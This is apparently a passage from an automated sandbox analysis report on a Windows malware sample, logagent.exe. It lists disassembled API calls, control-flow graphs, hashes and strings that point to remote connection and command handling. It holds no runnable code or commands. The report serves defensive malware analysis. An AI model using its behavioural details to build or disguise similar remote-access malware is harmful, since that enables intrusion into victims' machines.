                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                  • CreateThread.KERNEL32 ref: 0040D240
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                  • atoi.MSVCRT ref: 0040D285
                                  • Sleep.KERNELBASE(00000000), ref: 0040D293
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                  • String ID: %I64u$2.7.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                  • API String ID: 43808216-1859881042
                                  • Opcode ID: c8771bf38c1e98cf7186b6ba4d9f43e285e297f6f0f4a789da87c820c5ea5611
                                  • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                  • Opcode Fuzzy Hash: c8771bf38c1e98cf7186b6ba4d9f43e285e297f6f0f4a789da87c820c5ea5611
                                  • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004135DE Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 667 4135de-4135fe ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z 668 413731-4137d4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ GetLongPathNameW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z * 2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z * 2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 5 667->668 669 413604 667->669 670 413615-413632 call 412100 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z 669->670 671 413634-413639 669->671 672 413714-413719 669->672 673 413648-41364f call 412aeb 669->673 674 41360b-413610 669->674 675 41371b 669->675 676 41370d-413712 669->676 677 41363e-413643 669->677 685 4136aa-4136b0 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 670->685 678 413720-41372b _wgetenv ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 671->678 672->678 683 413651-4136a7 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 673->683 684 4136b2-41370b ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 673->684 674->678 675->678 676->678 677->678 678->668 683->685 684->685 685->668
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                  • _wgetenv.MSVCRT ref: 0041366D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                  • _wgetenv.MSVCRT ref: 004136CE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                  • _wgetenv.MSVCRT ref: 00413720
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                  • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                  • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 1999370131-1609423294
                                  • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                  • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040221E Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 686 40221e-40223b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z 687 40223e-402252 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 686->687 688 402254-402289 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40309e ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 687->688 689 40228b-402291 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 687->689 690 402297-4022b3 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4023f0 688->690 689->690 695 4023e0-4023ed ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 690->695 696 4022b9-4022ca ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 690->696 697 4022d0-4022e4 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 696->697 698 4023d2-4023dd ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 696->698 699 4022f2-402342 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 697->699 700 4022e6-4022ec ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 697->700 698->695 701 402344-40235a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z 699->701 702 40235c-402392 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 699->702 700->699 703 402398-4023cb ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 701->703 702->703 703->695 705 4023cd 703->705 705->687
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6DF55DF0), ref: 00402302
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
